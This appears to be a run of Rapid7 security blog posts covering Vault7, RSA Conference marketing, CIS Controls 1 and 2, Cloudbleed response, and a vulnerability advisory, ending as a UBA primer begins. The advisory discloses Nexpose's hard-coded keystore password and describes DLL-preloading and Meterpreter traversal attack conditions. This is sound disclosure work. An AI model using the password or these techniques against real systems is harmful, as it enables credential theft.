What follows are some first impressions on the contents of the WikiLeaks Vault7 dump. I won't be addressing the legal or ethical concerns about posting classified data that can endanger the missions and goals of American intelligence organizations. I also won't be talking about whether or not the CIA should be involved in developing cyber capabilities in the first place as we have previously written about our views on this topic. But, I will talk about the technical content of the documents posted today, which all appear to come from a shared, cross-team internal Confluence wiki used by several CIA branches, groups, and teams.

 

After spending the last few hours poring over the newly released material from WikiLeaks, Vault7, I'm left with the impression that the activities at the CIA with regards to developing cyber capabilities are... pretty normal.

 

The material is primarily focused on the capabilities of "implants" -- applications that are installed on systems after they've been compromised -- and how they're used to exfiltrate data and maintain persistence after an initial compromise of a variety of devices from Samsung smart TVs to Apple iPhones to SOHO routers, and everything in between.

 

The material also covers the command and control infrastructure that the CIA maintains to remotely use these implants; primarily, the details are concerned with building and testing the various components that make up this network.

 

Finally, there are the projects that are focused on exploits. The exploits described are either developed in-house, or acquired from external partners. Most of the internally developed exploits are designed to escalate privileges once access is secured, while most of the remote capabilities were acquired from other intelligence organizations and contractors. The CIA does appear to prefer to develop and use exploits that have a local, physical access component.

 

While there is still a lot left to look at in detail, the overwhelming impression that I get from reading the material is that working on offensive tech at the CIA is pretty similar to working on any software project at any tech company. More to the point, the CIA activities detailed here are eerily similar to working on Metasploit at Rapid7. Take, for example, this post about the Meterpreter Mettle project from 2015 (which was written about the same time as these documents). Tell me that Mettle doesn't read like any one of the technical overviews in Vault7.


As we spend more time digging through the Vault7 material, and if more material is released over time, I expect we'll be less and less surprised. So far, these documents show that the CIA branches and subgroups named in the documents are behaving pretty much exactly as one might expect of any software development shop. Yes, they happen to be developing exploit code. But, as we all know, that particular capability, in and of itself, isn't novel, illegal, or evil. Rapid7, along with many other security research organizations, both public and private, do it every day for normal and legitimate security purposes.

 

Until I see something that's strikingly unusual, I'm having a hard time staying worked up over Vault7.

If you walked the RSA Conference floor(s) in San Francisco this year, you probably needed to sit down a few times while passing the 680 vendors - not because of the distance or construction as much as from the sensory overload and Rubik's cube challenge of matching vendors with the problems they address.

 

Since Anton Chuvakin already stole my thunder by declaring there was no theme, with snark so effective it made me jealous, I want to talk about the attention-grabbing claims intended to make solutions stand out in the Times Square-like atmosphere, which instead made it difficult for any new attendee to make sense of it all.

 

“Buy this technology! It is a silver bullet.”

I was mistakenly convinced that we, as a security industry, had finally moved away from the notion that one solution could solve every security problem. Blame it on fresh-faced marketing teams or true startup believers who’ve poured their heart into a solution and cannot stand the thought of missing payroll. Whatever the cause, the 42,000 attendees were assaulted with promises such as “…prevents all device compromise, stops all ongoing attacks…” and “stop all attacks – remove AV”. Layered defense doesn’t sound sexy and it is often ridiculed as “expense-in-depth”, but it is still unfortunately a reality that no single security vendor can meet all of your needs across the triad of people, process, and technology.

 

The other half of the “so this technology is all I’ll ever need?” inference is your sudden explosion of options if you want our future machine overlords to defeat the inferior human attackers. Yes, I’m talking about “artificial intelligence” - but it didn’t stop there - one vendor had both AI and “swarm intelligence”. This is where marketing has started to go too far – at best, these solutions have some supervised machine learning algorithms and a data science team regularly using feedback to tune them [which is awesome, but not AI]; at worst, these solutions have unsupervised machine learning spewing out pointless anomalies in datasets unrelated to any realistic attacker behavior. While I loved the drone swarm responsible for the Super Bowl light show, humans were controlling those. If a single endpoint agent can discover a new malicious behavior and immediately communicate it back to the rest of the Borg-like swarm without any human assistance, they had better not quietly announce it for the first time at a conference hall.

 

“You want hunting, so we built automated, self-healing hunting agents!”

I noticed more vendors offering hunting services, even once as “hunting human attackers” [which caught my eye because of its clarity], and I’m not surprised given the significant barrier to small teams acquiring this advanced skill for detecting unknown threats. However, it’s already been fused with the legitimate demand for more automation in the incident response workflow to bring us a bevy of “automated hunting” and “automating the hunt” technologies, which would be oxymorons if they weren’t just pure contradictions of terms. “Automated hunting” sounds like the built-in indicators inherent to every detection solution I’ve seen, while “automating the hunt” can only be done by an advanced analyst who is scheduling hunts to occur and provide deltas for follow-up analysis, not by a piece of software looking for known indicators and unusual events. Sure, technology simplifies this process by revealing rare and unusual behavior, but detecting known IOCs is not hunting.


 

In a similar vein, I read about “self-healing endpoints” throughout downtown San Francisco and it brought up a lot more questions than answers. Are the deployed agents healing themselves when disabled? Will it heal my Windows 10 laptop after finding malware on it? Does it automatically restore any encrypted data from a ransomware attack? Can it administer virtual aspirin if it gets an artificial intelligence headache? Obviously, I could have visited a booth and asked these questions, but something tells me the answers would disappoint me.

 

“Re-imagined! ∞.0! Next-next-gen!”

After the Next-gen Firewall revolution, it seems like everybody is touting SIEM 2.0 and Next-gen AV, and it’s understandable when the available technologies for software development and data processing make leaps forward to enable a redesign of decade-old architectures, but the pace has now quickened. I ran across “deception 2.0” just two years after I first saw TrapX at RSA Conference and only a few months after I heard “deception technology” coined as a term for the niche. At this pace, we’ll be talking about Next-gen Deception and Swarm Intelligence 2.0 by Black Hat. As a general rule, if visitors to your booth have to ask “what is technology ‘x’?”, it’s too soon to start defining your company’s approach to it as 2.0.

 

As another reimagining of security, I'm enough of a geek to think virtual reality in a SOC sounds cool, but after seeing what it's like to "bring VR to IR", I felt like it just adds another skill an analyst needs to develop, on top of a list already so long that specialization is key. Then I remembered how often I see analysts resort to command line interfaces, and the novelty wore off.

 

There are a lot of innovative approaches to the information security problems we face and I even saw some on display at RSA Conference. I just wish it weren’t such an exhausting fight through the noise to find them.

The Rapid7 Security Advisory Service relies heavily on the CIS top 20 critical controls as a framework for security program analysis because they are universally applicable to information security and IT governance. Correct implementation of all 20 of the critical controls greatly reduces security risk, lowers operational costs, and significantly improves any organization’s defensive posture.  The 20 critical controls are divided into System, Network, and Application families, and each control can be subdivided into sections in order to facilitate implementation and analysis.

 

The first of the 20 controls, “Inventory of Authorized and Unauthorized Devices” is split into 6 focused sections relating to network access control, automation and asset management. The control specifically addresses the need for awareness of what’s connected to your network (Tip: Don't forget to scan your network for IoT devices), as well as the need for proper internal inventory management and management automation. Implementing inventory control is probably the least glamorous way to improve a security program, but if it's done right it reduces insider threat and loss risks, cleans up the IT environment and improves the other 19 controls.

What it is:

The Inventory of Authorized and Unauthorized Devices is part of the “systems” group of the CIS top 20 critical security controls. It specifically addresses the need for awareness of what is on your network, as well as awareness of what shouldn't be. Sections 1.1, 1.3 and 1.4 address the need for automated tracking and inventory, while 1.2, 1.5 and 1.6 are related to device-level network access control and management. The theme of the control is fairly simple: you should be able to see what is on your network, know which systems belong to whom, and use this information to prevent unauthorized users from connecting to the network. High-maturity organizations often address the automation and management sections of this control well, but Rapid7 often sees gaps around inventory-based network access control due to the perceived complexity of implementing NAC.

 

How to implement it:

There are numerous effective ways to implement the Inventory of Authorized and Unauthorized Devices control. Many of them will also significantly improve the implementation of other controls relating to network access, asset configuration, and system management. Successful implementations often focus on bridging existing system inventory or configuration management services and device-based network access control. The inventory management portion is usually based on software or endpoint management services such as SCCM, while access control can leverage existing network technology to limit device access to networks.

Robust implementation of DHCP logging and management will effectively address sections 1.1, 1.2, and 1.4 of Critical Control #1. Deploying DHCP logging and using the outputs to establish awareness of what is currently connected to the network is an extremely good first step to full implementation. Tracking DHCP activity has an additional impact on the IT support and management side of the organization, as well; it serves as a sort of “early warning” system for network misconfiguration and management issues. For organizations with a SIEM solution or centralized audit repository, ingested DHCP logs can allow correlation with other security and network events. Correlating the logs against additional system information from tools like SCCM or event monitoring services can also assist with inventory tracking and automated inventory management, which has added benefits on the financial and operations management side of the shop, as well.
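
To show what "using the outputs" can look like in practice, on a Linux DHCP server the lease activity is already in syslog, so even a one-liner gives a crude picture of what is joining the network (log paths differ by distribution; Windows DHCP servers keep an equivalent audit log under %windir%\System32\dhcp):

# Most recent DHCP acknowledgements: IP handed out, client MAC, and often the hostname
grep -i DHCPACK /var/log/syslog | tail -20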

 

Admin Tips:

  • For DHCP-enabled network segments that have lower change rates (non-workstation segments) consider adding a detective control such as a notification of a new DHCP lease. Backup, VOIP, or network device management networks are often effective conduits for an attacker’s lateral movement efforts, and usually don’t have a high amount of device churn, so increasing detective controls there may create little administrative overhead and increase the possibility of detecting indicators of compromise.

 

  • The Inventory of Authorized and Unauthorized Devices control also recommends the use of automated inventory tools that scan the network to discover new systems or devices, as well as tracking the changes made to existing systems. While DHCP logging is an effective basic measure, tools such as SCCM, KACE, Munki, and SolarWinds effectively lower the effort and time surrounding inventory management, asset configuration, and system management. 

 

  • Many customers with existing Microsoft Enterprise Agreements may already have licenses available for SCCM. When combined with Certificate Authorities, Group Policies, and some creativity with PowerShell, a handful of administrators can maintain awareness and control of authorized devices to address many aspects of this foundational critical control.

 

 

Even if you don't use SCCM or Nexpose, most agent-based system discovery and configuration management tools will allow your organization to address this control and other governance requirements. Effective implementation of inventory-based access control lets the organization see and manage what is connecting to its network, which is critical for any good security program. While management tools often require time and effort to deploy, the cost benefit is significant; they allow smaller IT teams to have a major impact on their network quickly, and assist with patching, situational awareness, and malware defense.

Hat tip and thanks to Jason Beatty and Magen Wu for application-specific info and editorial suggestions.

 

Related: The CIS Critical Security Controls Explained – Control 2: Inventory of Authorized and Unauthorized Software

Today, we'd like to announce eight vulnerabilities that affect four Rapid7 products, as described in the table below. While all of these issues are relatively low severity, we want to make sure that our customers have all the information they need to make informed security decisions regarding their networks. If you are a Rapid7 customer who has any questions about these issues, please don't hesitate to contact your customer success manager (CSM), our support team, or leave a comment below.

 

For all of these vulnerabilities, the likelihood of exploitation is low, due to an array of mitigating circumstances, as explained below.

 

Rapid7 would like to thank Noah Beddome, Justin Lemay, Ben Lincoln (all of NCC Group); Justin Steven; and Callum Carney - the independent researchers who discovered and reported these vulnerabilities, and worked with us on pursuing fixes and mitigations.

 

Rapid7 ID | CVE           | Product           | Vulnerability                                                         | Status
----------|---------------|-------------------|-----------------------------------------------------------------------|---------------------------
NEX-49834 | CVE-2017-5230 | Nexpose           | Hard-Coded Keystore Password                                          | Mitigations available
MS-2417   | CVE-2017-5228 | Metasploit        | stdapi Dir.download() Directory Traversal                             | Fixed (4.13.0-2017020701)
MS-2417   | CVE-2017-5229 | Metasploit        | extapi Clipboard.parse_dump() Directory Traversal                     | Fixed (4.13.0-2017020701)
MS-2417   | CVE-2017-5231 | Metasploit        | stdapi CommandDispatcher.cmd_download() Globbing Directory Traversal  | Fixed (4.13.0-2017020701)
PD-9462   | CVE-2017-5232 | Nexpose           | DLL Preloading                                                        | Fixed (6.4.24)
PD-9462   | CVE-2017-5233 | AppSpider Pro     | DLL Preloading                                                        | Fix in progress (6.14.053)
PD-9462   | CVE-2017-5234 | Insight Collector | DLL Preloading                                                        | Fixed (1.0.16)
PD-9462   | CVE-2017-5235 | Metasploit Pro    | DLL Preloading                                                        | Fixed (4.13.0-2017022101)

CVE-2017-5230: Rapid7 Nexpose Static Java Keystore Passphrase

Cybersecurity firm NCC Group discovered a design issue in Rapid7's Nexpose vulnerability management solution, and has released an advisory with the relevant details here. This section briefly summarizes NCC Group's findings, explains the conditions that would need to be met in order to successfully exploit this issue, and offers mitigation advice for Nexpose users.

 

Conditions Required to Exploit

One feature of Nexpose, as with all other vulnerability management products, is the ability to configure a central repository of service account credentials so that a VM solution can log in to networked assets and perform a comprehensive, authenticated scan for both exposed and patched vulnerabilities. Of course, these credentials tend to be sensitive, since they tend to have broad reach across an organization's network, and care must be taken to store them safely.

 

The issue identified by NCC Group revolves around our Java keystore for storing these credentials, which is encrypted with a static, vendor-provided password, "r@p1d7k3y5t0r3." If a malicious actor were to get a hold of this keystore, that person could use this password to decrypt and expose all stored scan credentials. While this is not obviously documented, this password is often known to Nexpose customers and Rapid7 support engineers, since it's used in some backup recovery scenarios.

 

This vulnerability is not likely to offer an attacker much of an advantage, however, since they would need to already have extraordinary control over your Nexpose installation in order to exercise it. This is because high-level privileges are required to actually get hold of the keystore that contains the stored credentials. So, in order to obtain and decrypt this file, an attacker would need to already have at least root/administrator privileges on the server running the Nexpose console, OR have a Nexpose console "Global Administrator" account, OR have access to a backup of a Nexpose console configuration.

 

If the attacker already has root on the Nexpose console, the jig is up; customers are already advised to restrict access to Nexpose servers through normal operating system and network controls. This level of access would already represent a serious security incident, since the attacker would have complete control over the Nexpose services and could leverage one of any number of techniques to extend privileges to other network assets, such as conducting local man-in-the-middle network monitoring, local memory profiling, or other, more creative techniques to increase access.

 

Similarly, Global Administrator access to the Nexpose console would, at minimum, allow an attacker to obtain a list of every vulnerable system in scope, alter or skip scheduled scans, and create new and malicious custom scan templates.

 

That leaves Nexpose console backups, which we believe represents the most likely attack vector. Sometimes, backups of critical configurations are stored in networked locations that aren't as secure as the backed-up system itself. We advise against this, for obvious reasons; if backups are not secured at least as well as the Nexpose server itself, it is straightforward to restore the backup to a machine under the attacker's control (where he would have root/administrator), and proceed to leverage that local privilege as above.

 

Designing a Fix

While encrypting these credentials at rest is clearly important for safety's sake, eventually these credentials do have to be decrypted, and the key to that decryption has to be stored somewhere. After all, the whole point of a scheduled, authenticated scan is to automate logins. Storing that key offline, in an operator's head, means having to deal with a password prompt anytime a scan kicks off. This would be a significant change in how the product works, and would be a change for the worse.

 

Designing a workable fix to this exposure is challenging. The simple solution is to enable users to pick their own passwords for this keystore, or generate one per installation. This would at least force attackers who have gained access to critical network infrastructure to do the work of either cracking the saved keystore, or do the slightly more complicated work of stepping through the decryption process as it executes.

 

Unfortunately, this approach would immediately render existing backups of the Nexpose console unusable -- a fact that tends to only be important at the least opportune time, after a disaster has taken out the hosting server. Given the privilege requirements of the attack, this trade-off, in our opinion, isn't worth the future disaster of unrestorable backups.

 

While we do expect to implement a new strategy for encrypting stored credentials in a future release, care will need to be taken to both ensure that the customer experience with disaster recovery remains the same and support costs aren't unreasonably impacted by this change.

 

Mitigations for CVE-2017-5230

Until an updated version is available, Nexpose customers who use authenticated scans are advised to take care in securing their Nexpose backups, as well as their Nexpose consoles, to avoid this and other exposures.

 

CVE-2017-5228, CVE-2017-5229, CVE-2017-5231: Metasploit Meterpreter Multiple Directory Traversal Issues

Metasploit Framework contributor and independent security researcher Justin Steven reported three issues in the way Metasploit Meterpreter handles certain directory structures on victim machines, which can ultimately lead to a directory traversal issue on the Meterpreter client. Justin reported his findings in an advisory, here.

 

Conditions Required to Exploit

In order to exploit this issue, we need to first be careful when discussing the "attacker" and "victim." In most cases, a user who is loading and launching Meterpreter on a remote computer is the "attacker," and that remote computer is the "victim." After all, few people actually want Meterpreter running on their machine, since it's normally delivered as a payload to an exploit.

 

However, this vulnerability flips these roles around. If a computer acts as a honeypot, and lures an attacker into loading and running Meterpreter on it, that honeypot machine has a unique opportunity to "hack back" at the original Metasploit user by exploiting these vulnerabilities.

 

So, in order for an attack to be successful, the attacker, in this case, must entice a victim into establishing a Meterpreter session to a computer under the attacker's control. Usually, this will be the direct result of an exploit attempt from a Metasploit user.

 

Designing a Fix

Justin worked closely with the Metasploit Framework team to develop fixes for all three issues. The fixes themselves can be inspected in the open source Metasploit framework repository, at Pull Requests 7930, 7931, and 7932, and ensure that data from Meterpreter sessions is properly inspected, since that data can possibly be evil. Huge thanks to Justin for his continued contributions to Metasploit!

 

Mitigations for CVE-2017-5228, CVE-2017-5229, CVE-2017-5231

In addition to updating Metasploit to at least version 4.13.0-2017020701 (the fixed version noted in the table above), Metasploit users can help protect themselves from the consequences of interacting with a purposefully malicious host with the use of Meterpreter's "Paranoid Mode," which can significantly reduce the threat of this and other undiscovered issues involving malicious Meterpreter sessions.

 

CVE-2017-5232, CVE-2017-5233, CVE-2017-5234, CVE-2017-5235: DLL Preloading

Independent security researcher Callum Carney reported to Rapid7 that the Nexpose and AppSpider installers ship with a DLL Preloading vulnerability, wherein an attacker could trick a user into running malicious code when installing Nexpose for the first time. Further investigation from Rapid7 Platform Delivery teams revealed that the installation applications for Metasploit Pro and the Insight Collector exhibit the same vulnerability.

 

Conditions Required to Exploit

DLL preloading vulnerabilities are well described by Microsoft, here, but in short, they occur when a program fails to specify an exact path to a system DLL; instead, the program searches for that DLL in a number of default system locations, as well as the current directory.

 

In the case of an installation program, that current directory may be a general "Downloads" folder, which can contain binaries downloaded from all sorts of places.

 

If an attacker can convince a victim to download a malicious DLL, store it in the same location as one of the Rapid7 installers identified above, and then install one of those applications, the victim can trigger the vulnerability. In practice, DLL preloading vulnerabilities occur more often on shared workstations, where the attacker specifically poisons the Downloads directory with a malicious DLL and waits for the victim to download and install an application susceptible to this preloading attack. It is also sometimes possible to exercise a browser vulnerability to download (but not execute) an arbitrary file, and again, wait for the user to run an installer later. In all cases, the attacker must already have write permissions to a directory that contains the Rapid7 product installer.

 

Usually, people only install Rapid7 products once each per machine, so the window of exploitation is also severely limited.

 

Designing a Fix

In the case of Metasploit Pro, Nexpose, and the Insight Collector, the product installers were updated to define exactly where system DLLs are located, and no longer rely on dynamic searching for missing DLLs. An updated installer for AppSpider Pro will be made available once testing is completed.

 

Mitigations for CVE-2017-5232, CVE-2017-5233, CVE-2017-5234, CVE-2017-5235

In all cases, users are advised to routinely clean out their "Downloads" folder, as this issue tends to crop up in installer packages in general. Of course, users should be aware of where they are downloading and running executable software, and Microsoft Windows executables support a robust, certificate-based signing procedure that can ensure that Windows binaries are, in fact, what they purport to be.

 

Users who keep historical versions of installers for backup and downgradability purposes should be careful to only launch those installation applications from empty directories, or at least, directories that do not contain unknown, unsigned, and possibly malicious DLLs.
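One practical way to apply that advice before running a saved installer is to check whether any DLLs already share a directory with it. The sketch below is a generic, hypothetical check written in Python, not a Rapid7-provided tool; it simply warns when the installer's folder contains DLL files.

```python
import pathlib
import sys

def check_installer_directory(installer_path):
    """Warn if DLLs share a directory with the installer (DLL preloading risk)."""
    installer = pathlib.Path(installer_path).resolve()
    stray_dlls = sorted(p.name for p in installer.parent.glob("*.dll"))
    if stray_dlls:
        print(f"WARNING: {installer.parent} contains DLLs: {', '.join(stray_dlls)}")
        print("Move the installer to an empty directory before running it.")
        return False
    print(f"{installer.parent} contains no DLLs; safer to run {installer.name}.")
    return True

if __name__ == "__main__":
    # Usage: python check_installer_dir.py path\to\installer.exe
    sys.exit(0 if check_installer_directory(sys.argv[1]) else 1)
```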

 

Coordinated Disclosure Done Right

NCC Group, Justin Steven, and Callum Carney all approached Rapid7 with these issues privately, and have proven to be excellent and accommodating partners in reporting these vulnerabilities to us. As a publisher of vulnerability information ourselves, Rapid7 knows that this kind of work can at times be combative, unpleasant, and frustrating. Thankfully, that was not the case with these researchers, and we greatly appreciate their willingness to work with us and lend us their expertise.

 

If you're a Rapid7 customer who has any questions about this advisory, please don't hesitate to contact your regular support channel, or leave a comment below.

TL;DR

This week a vulnerability was disclosed, which could result in sensitive data being leaked from websites using Cloudflare's proxy services. The vulnerability - referred to as "Cloudbleed" - does not affect Rapid7's solutions/services.

 

This is a serious security issue, but it’s not a catastrophe. Out of an abundance of caution, we recommend you reset your passwords, starting with your most important accounts (especially admin accounts). A reasonable dose of skepticism and prudence will go a long way in effectively responding to this issue.

 

What’s the story on this Cloudflare vulnerability?

On February 18, 2017 Tavis Ormandy, a vulnerability researcher with Google’s Project Zero, uncovered sensitive data leaking from websites using Cloudflare’s proxy services, which are used for their content delivery network (CDN) and distributed denial-of-service (DDoS) mitigation services. Cloudflare provides a variety of services to a lot of websites - a few million, in fact. Tavis notified Cloudflare immediately. A few features in Cloudflare’s proxy services had been using a flawed HTML parser that leaked uninitialized memory from Cloudflare’s edge servers in some of their HTTP responses. Vulnerable features in Cloudflare’s service were disabled within hours of receiving Tavis’ disclosure, and their services were fully patched with all vulnerable features fully re-enabled within three days. Cloudflare has a detailed write-up about Cloudbleed's underlying issue and their response to it - check it out!

 

This Cloudflare memory leak issue is certainly serious, and it's great to see that Cloudflare is acting responsibly and rapidly after receiving a disclosure of Google’s findings on a Friday night. Most companies require several weeks to respond to vulnerability disclosures, but Cloudflare mitigated the vulnerability within hours and appears to have done the majority of the work required to fully remediate the issue in well under a week, starting on a weekend, which itself is impressive.

 

Why should I care?

Your information may have been leaked. Any vendor’s website using Cloudflare’s proxy service could have exposed your passwords, session cookies, keys, tokens, and other sensitive data. If your organization used this Cloudflare proxy service between September 22, 2016 and February 18, 2017, your data and your customers’ data could have been leaked and cached by search engines. As Ryan Lackey notes, “Regardless, unless it can be shown conclusively that your data was NOT compromised, it would be prudent to act as if it were.”

 

Who is affected by the Cloudflare vulnerability?

Before Tavis' disclosure, data had been leaking for months. It’s too soon to know the full scope of the data that was leaked and the sites and services that were affected (although we're off to a decent start). There is currently a fair amount of confusion and misalignment on the status of various services. For example, Tavis claims to have recovered cached 1Password API data, while 1Password claims users’ password data could not be exposed by this bug.

 

How bad is it, really?

One of the most important things to consider right now is that understanding the full impact of this Cloudflare bug will take some time; it’s too soon to know exactly how deep this goes. However, if we’re using Heartbleed as our de facto “security bug severity measuring stick”, it looks at this point like the Cloudflare bug is not as disastrous.

 

For starters, the Cloudflare bug was centralized in one place (i.e. Cloudflare’s proxy service). While search engines like Google, Bing, and Yahoo cached leaked data from Cloudflare, they were quick to purge these caches with Cloudflare’s help. Cloudflare stopped the bleeding and worked with Google and others to mop up the remaining mess very quickly. As of now, the scope of affected data seems relatively limited. According to Cloudflare, “The greatest period of impact was from February 13 and February 18 with around 1 in every 3,300,000 HTTP requests through Cloudflare potentially resulting in memory leakage.”

 

On the other hand, Heartbleed existed for two years before it was disclosed. It also needed to be patched everywhere it existed - it was decentralized - and there are still systems vulnerable to Heartbleed today. There are known instances of attackers using Heartbleed to steal millions of records, months after a patch was released. At this point in time, there’s no evidence of attackers exploiting Cloudbleed.

 

Think about the “best case scenario” for users protecting themselves against the Cloudflare vulnerability vs. Heartbleed. To protect against Cloudbleed, users need to follow a few steps (which we’ve outlined below). To protect themselves from Heartbleed, users had to follow all of these same steps, reroll SSL/TLS certificates, and patch OpenSSL on all of their vulnerable systems.

 

What do I do now?

There are several steps you can take to protect yourself:

  1. Log out and log back into your accounts to inactivate your accounts' sessions, especially for sites/services that are known to have been impacted by this (e.g. Uber).
  2. Clear your browser cookies and cache.
  3. This is a great time to change your passwords, keys, and other potentially affected credentials - something you should be doing regularly anyway! While there was some talk of password manager data being exposed, this shouldn’t scare you away from using these tools. For the vast majority of us, it is the most practical way to ensure we’re using strong, unique passwords on every site with the ability to more easily update those passwords on a regular basis.
  4. Set up two-factor authentication on every one of your accounts that supports it, especially your password manager.
  5. If your website or services used services affected by the Cloudflare vulnerability during the time window mentioned above, force your users to reset all of their authentication credentials (passwords, OAuth tokens, API keys, etc.). Also reset credentials used for system and service accounts.
  6. Keep an eye out for notifications from your vendors, check their websites and blogs, and proactively contact them - especially those that handle your critical and sensitive data - about whether or not they were affected by this bug and how you can continue using their services securely if they were.
  7. If you’re not sure whether you’re using an affected site or service, check out this tool: Does it use Cloudflare? (Or script the check yourself, as in the sketch following this list.)
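If you would rather script that check across your own vendor list, a response carrying a CF-RAY header or a "Server: cloudflare" header is a strong hint that the site is fronted by Cloudflare's proxy. The sketch below is a heuristic only, and the sample domains are placeholders.

```python
import urllib.request

def behind_cloudflare(domain):
    """Heuristic: Cloudflare-proxied sites answer with CF-RAY / Server: cloudflare."""
    req = urllib.request.Request(f"https://{domain}/", method="HEAD")
    with urllib.request.urlopen(req, timeout=10) as resp:
        headers = {k.lower(): v for k, v in resp.getheaders()}
    return "cf-ray" in headers or headers.get("server", "").lower() == "cloudflare"

for site in ["example.com", "example.org"]:   # replace with your own vendor list
    try:
        print(site, "-> Cloudflare?", behind_cloudflare(site))
    except Exception as exc:
        print(site, "-> check failed:", exc)
```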

 

Big thanks to my teammate Katie Ledoux for writing this post with me!

As I mentioned in our last post, the 20 critical controls are divided into System, Network, and Application families in order to simplify analysis and implementation. This also allows partial implementation of the controls by security program developers who aren't building a program from scratch, but want to apply all 20 of the controls. The first two controls of the Center for Internet Security's (CIS) Critical Controls are based around inventory; in my experience, they're also often overlooked by most security teams at the level that the CIS and NIST address them. Knowledge and control of inventory is an essential security architecture need - done properly, it gives the security team very strong awareness of the organization's network and personnel environment, and significantly improves detection and response aspects of any security program.

 

The second control, “Inventory of Authorized and Unauthorized Software” is split into 4 sections, each dealing with a different aspect of software management. Much like Control 1, “Inventory of Authorized and Unauthorized Devices”, this control addresses the need for awareness of what’s running on your systems and network, as well as the need for proper internal inventory management. The CIS placed these controls as the "top 2" in much the same way that the NIST Cybersecurity Framework addresses them as "priority 1" controls on the 800-53 framework; inventory and endpoint-level network awareness is critical to decent incident response, protection and defense.


What it is:

The Inventory of Authorized and Unauthorized Software is part of the “systems” group of the 20 critical controls. The theme of the control is fairly simple: you should be able to see what software is on your systems, who installed it, and what it does, and you should be able to use this information to prevent unauthorized software from being installed on endpoints. The control is well outlined in NIST Special Publication 800-167, and relates back to NIST 800-53 and Cybersecurity Framework recommendations. High-maturity organizations often address the automation and management sections of this control well, but Rapid7 sees gaps around software configuration control based on inventory, due to the perceived complexity of implementing software inventory management systems or endpoint management clients.

 

How to implement it:

Many of the methods used to implement the inventory of authorized and unauthorized software will also significantly improve the implementation of other controls relating to network access, asset configuration, and system management (Controls 1, 6, 10, 14, 15, 17, and 19). Specifically, Local Administrator access and install rights should not be granted to most users. This limitation also assists with other critical controls that deal with access and authentication. Limiting who can install software also limits who can click “OK” on installations that include malware, adware, and other unwanted code. The added bonus of successfully removing admin rights is a smaller shadow IT footprint in most organizations, contributing to better internal communication and security awareness.


Once installation rights have been limited, any whitelisting or blacklisting processes should be done in stages, typically starting with a list of unauthorized applications (a blacklist) and finishing with a list of authorized applications that makes up the whitelist. This can be rolled out as an authorized software policy first, followed by scanning, removal, and then central inventory control. Successful implementations of software inventory control often focus on bridging system configuration management services and software blacklisting and whitelisting. The inventory management portion is usually based on a software inventory tool or endpoint management services such as SCCM or Footprints, or GPO and local policy controls on Windows.
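As a starting point for the inventory itself, much of the data is already on each endpoint. The sketch below is a minimal, Windows-only illustration that reads the uninstall registry keys with Python's winreg module to list installed software; field names vary by installer, so treat the output as raw material for the blacklist/whitelist work above.

```python
import winreg

UNINSTALL_PATHS = [
    r"SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall",
    r"SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall",
]

def installed_software():
    """Yield (name, version, publisher) from the local uninstall registry keys."""
    for path in UNINSTALL_PATHS:
        try:
            root = winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path)
        except OSError:
            continue
        for i in range(winreg.QueryInfoKey(root)[0]):
            try:
                sub = winreg.OpenKey(root, winreg.EnumKey(root, i))
                name = winreg.QueryValueEx(sub, "DisplayName")[0]
            except OSError:
                continue  # not every subkey describes an installed product
            def value(field):
                try:
                    return winreg.QueryValueEx(sub, field)[0]
                except OSError:
                    return ""
            yield name, value("DisplayVersion"), value("Publisher")

if __name__ == "__main__":
    for name, version, publisher in sorted(installed_software()):
        print(f"{name}\t{version}\t{publisher}")
```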

 

Beyond limiting administrator and installation rights and blacklisting, some form of integrity checking and management should be set up. This is possible using only OS-based tools in most cases, and Microsoft includes integrity management tools in Windows 10. Typically, OS-level integrity management tools rely on limiting installation based on a list of trusted actors (installers, sources, etc.). In more comprehensive cases, such as some endpoint protection services, there are heuristic and behavior-based tools that monitor critical application libraries and paths for change. Since integrity management is intrinsically tied to malware prevention and data protection, implementing this section of the control actually assists with Controls 8, 9, and 14: Browser and E-mail Configuration, Malware Defenses, and Data Protection.
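For a bare-bones version of that integrity check, the sketch below hashes the files under a set of watched application paths and compares them against a previously saved baseline. The watched paths and baseline filename are placeholders; real endpoint protection suites add trust lists, tamper protection, and alerting on top of this idea.

```python
import hashlib
import json
import pathlib
import sys

BASELINE = "integrity_baseline.json"          # hypothetical baseline file
WATCHED = [r"C:\Program Files\CriticalApp"]   # hypothetical paths to monitor

def sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def snapshot():
    """Hash every file under the watched directories."""
    return {str(p): sha256(p)
            for root in WATCHED
            for p in pathlib.Path(root).rglob("*") if p.is_file()}

if __name__ == "__main__":
    if len(sys.argv) > 1 and sys.argv[1] == "baseline":
        with open(BASELINE, "w") as fh:
            json.dump(snapshot(), fh, indent=2)   # record the known-good state
    else:
        with open(BASELINE) as fh:
            old = json.load(fh)
        new = snapshot()
        for path in sorted(set(old) | set(new)):
            if old.get(path) != new.get(path):
                print("CHANGED, ADDED, OR REMOVED:", path)
```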

 

Admin Tips:

  • Aside from AppLocker, Microsoft allows GPO based whitelisting for supported versions of Windows. These can be edited locally using “secpol.msc” on everything but the “Home” versions of Windows. Organizations with domain controllers or centrally managed Group Policy Objects can use the same process by accessing “software restriction policies” and adjusting the “designated file types” object to include authorized software. This method is effective for workstations with limited software needs, and single-purpose systems such as application servers or virtual machines that run dedicated software. Apple’s OSX and most flavors of Linux have similar features, although they may be a little harder to access.

 

  • Most endpoint protection suites have some form of integrity protection included as an add-on. Your mileage may vary with this, since it can be tricky to tune the alerts from these services, but they're a helpful addition to the software integrity side of things, and can be used as a primary means of integrity control in cases where there's already a good inventory in place. 

 

  • For more general-purpose workstations, a number of client based solutions exist, ranging from antivirus and endpoint protection suites that limit software from a central console to tools like Carbon Black, Power Broker, and the Authority Management Suite integrated into Dell’s KACE.

 

Software inventory management is an important enough topic in security that the National Institute of Standards and Technology has published a guide to implementing software whitelisting which covers most of Control 2. It's part of their cybersecurity series, and is available for free on the NIST website as a PDF or by searching the site for publication 800-167. As I mentioned above, this control and the device inventory control are critical to having a responsive security program; getting the inventory side of the office in order will cut down on the amount of work needed when an incident arises, and will make policy development and enforcement far easier.

If you’re investing beyond malware detection, you’ve probably come across User Behavior Analytics (aka UBA, UEBA, SUBA). Why are organizations deploying UBA, and are they finding value in it? In this primer, let’s cover what’s being seen in the industry, and then a bit on how we’re approaching the problem here at Rapid7.

 

What Are Organizations Looking For?

